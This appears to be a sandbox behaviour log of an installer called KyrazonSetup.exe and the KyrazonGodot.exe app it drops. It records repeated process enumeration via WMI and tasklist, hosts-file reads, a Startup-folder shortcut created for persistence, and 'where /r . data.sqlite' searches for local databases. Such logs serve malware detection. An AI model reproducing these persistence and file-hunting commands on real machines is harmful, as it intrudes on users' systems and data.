Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\where.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KYRAZONGODOT.EXE'
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Shortcut.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile read: C:\Users\user\Desktop\KyrazonSetup.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\KyrazonSetup.exe "C:\Users\user\Desktop\KyrazonSetup.exe"
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv Jump to behavior
